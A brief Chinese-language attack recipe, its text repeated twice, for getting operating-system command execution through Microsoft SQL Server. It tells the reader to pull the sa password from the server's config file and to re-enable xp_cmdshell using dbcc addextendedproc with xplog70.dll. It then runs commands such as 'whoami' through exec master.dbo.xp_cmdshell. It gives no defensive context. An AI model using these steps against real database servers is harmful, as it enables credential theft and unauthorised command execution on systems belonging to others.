1
找到mssql的配置文件,拿到密码,【数据库权限需要sa】
2
连接进入数据库
我们需要将xp_cmdshell打开【默认是关闭的】
Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
3
执行命令
exec master.dbo.xp_cmdshell 'whoami'
1
找到mssql的配置文件,拿到密码,【数据库权限需要sa】
2
连接进入数据库
我们需要将xp_cmdshell打开【默认是关闭的】
Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
3
执行命令
exec master.dbo.xp_cmdshell 'whoami'